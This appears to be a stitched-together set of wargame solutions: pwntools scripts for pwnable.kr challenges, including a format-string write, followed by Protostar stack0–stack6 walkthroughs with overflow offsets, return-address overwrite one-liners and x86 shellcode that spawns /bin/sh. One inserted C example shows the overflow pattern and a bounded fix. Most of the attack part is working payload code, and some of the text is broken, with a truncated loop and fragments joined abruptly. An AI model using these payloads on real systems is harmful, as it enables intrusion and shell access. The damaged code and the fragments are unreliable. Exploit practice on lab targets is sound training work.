from pwn import *
sh = remote('pwnable.kr', 9003)
sh.recv(1024)
sh.sendline('AAAA\x78\x92\x04\x08\x40\xeb\x11\x08'.encode('base64'))
a = sh.recv(10000)
a = a.split('\n')
print a[1]
sh.interactive()

from pwn import *
sh = ssh(host='pwnable.kr', user='fsb', password='guest', port=2222)
proc = sh.process('/home/fsb/fsb')
proc.recv(1024)
proc.sendline('1')
proc.recvuntil('\n')
proc.sendline('1')
proc.recvuntil('\n')
proc.sendline('%10x%10x%10x%10x%10x%10x%10x%10x%10x%10x%10x%10x%134520720c%n')

from pwn import *
sh = remote('pwnable.kr', 9004)
sh.recv(10000)
sh.sendline('2')
sh.recv(10000)
for _ in range(3):
sh.sendline('1')
sh.recv(10000)
for _ in range(4):

Source code is at Source Code
The instruction at main+17 is lea 0x1c(%esp),%eax, so modified is at 0x1c(%esp).
The buffer starts at 0x5c(%esp), so the buffer size is 0x5c - 0x1c = 0x40.
If we input more than 0x40 characters, we get the message you have changed the 'modified' variable.
If you want to get a shell from this program, we have to change the return address.
The payload is (stack size [0x4c] + sfp + shellcode address).
I will load my shellcode into an environment variable and use that Shellcode.
Source code is at Source Code
This problem is really similar to stack0.
The difference between them is that stack0 gets input from the user via gets(), while stack1 gets it from argv.
From the main+55 instruction we can see that buffer starts at %esp+0x1c.
From the main+67 instruction we can see that modified is at %esp+0x5c.
First we have to type 0x40 characters to overflow buffer, and the next 4 characters should be dcba to get the message you have correctly got the variable to the right value.
Like this: ./stack1 $(python -c 'print "a"*0x40+"dcba"')
If you want to get a shell from this program, I will use this Shellcode.
Source code is at Source Code
The stack2 problem is similar to stack0 and stack1. The only difference is that stack2 gets input from the user via an environment variable.
From the main+21 instruction we can see that variable is at %esp+0x5c.
From the main+52 instruction we can see that modified is at %esp+0x58.
From the main+68 instruction we can see that buffer starts at %esp+0x18.
In this program, env[GREENIE] is copied into buffer. So if env[GREENIE] is longer than 0x40, we get the message you have correctly modified the variable.
Like this.
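The stack0/stack1/stack2 pattern above, as an added defender's example that is not part of this writeup: the 0x40-byte buffer sitting directly below modified, the unbounded copy the challenges use, and the bounded copy that fixes it. The struct layout, the stack1-shaped input helper and the function names are this example's own assumptions; the 0x61626364 value assumes a little-endian machine.

```c
#include <stdio.h>
#include <string.h>

/* Layout the page derives for stack0/stack1/stack2: a 0x40-byte buffer
   directly below the control variable 'modified'. A struct makes that
   adjacency deterministic for this demo; on Protostar it is the real
   stack frame (the struct is an assumption of this example). */
#define BUF_SIZE 0x40
struct frame {
    char buffer[BUF_SIZE];
    int  modified;
};

/* The challenge pattern: a gets()/strcpy()-style copy with no bound, so
   input longer than BUF_SIZE runs on into 'modified'. The copy goes
   through the frame's byte representation and is capped at the frame
   size so the demo itself stays well defined. */
int unbounded_copy(struct frame *f, const char *input) {
    size_t n = strlen(input) + 1;
    if (n > sizeof *f) n = sizeof *f;
    f->modified = 0;
    memcpy((unsigned char *)f, input, n);
    return f->modified;
}

/* Hardened form: the copy is bounded by the destination size and always
   NUL-terminated, so 'modified' is not reachable from the input. */
int bounded_copy(struct frame *f, const char *input) {
    f->modified = 0;
    snprintf(f->buffer, sizeof f->buffer, "%s", input);
    return f->modified;
}

/* Constructed input in the shape the page uses for stack1:
   0x40 filler bytes followed by "dcba". */
static void stack1_input(char *out, size_t out_len) {
    memset(out, 'a', BUF_SIZE);
    snprintf(out + BUF_SIZE, out_len - BUF_SIZE, "dcba");
}

/* Value of 'modified' after the chosen copy: on a little-endian machine the
   unbounded copy yields 0x61626364 ("dcba"), the bounded copy leaves 0. */
int stack1_demo(int hardened) {
    struct frame f;
    char input[BUF_SIZE + 8];
    stack1_input(input, sizeof input);
    return hardened ? bounded_copy(&f, input) : unbounded_copy(&f, input);
}
```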
Source code is at Source Code
To get the message code flow successfully changed, we have to overwrite the function pointer fp with the address of the win() function.
From the main+9 instruction we can see that fp is at %esp+0x5c.
From the main+17 instruction we can see that buffer starts at %esp+0x1c.
The address of the win() function is 0x08048424.
First we have to input 0x40 characters to overflow buffer, then input 0x08048424 to write the win() function address into fp.
Like this: (python -c 'print "a"*0x40+"\x24\x84\x04\x08"';cat) | ./stack3
If you want to get a shell from this program, I will use Shellcode.
Source code is at Source Code
We can get the code flow successfully changed message easily by overwriting the return address.
The address of the win() function is 0x080483f4.
Like this: (python -c 'print "a"*0x4c+"\xf4\x83\x04\x08"';cat) | ./stack4
If you want to get a shell from this program, I will use Shellcode.
export shellcode="\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
(python -c 'print "a"*0x4c+"\xda\xfe\xff\xbf"';cat) | ./stack4

Source code is at Source Code
The goal of the stack5 problem is to get a shell with shellcode.
It's really easy, isn't it?
I'll use Shellcode
export shellcode="\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
(python -c 'print "a"*0x4c+"\xda\xfe\xff\xbf"';cat) | ./stack5

Source code is at Source Code
I'll use Shellcode
The goal of stack6 is the same as stack5: just get a shell from this program.
We can't use shellcode on the stack in this problem because the program checks the return address.
The examiner gives us 3 ways to solve this problem:
- finding the duplicate of the payload
- ret2libc
- return oriented programming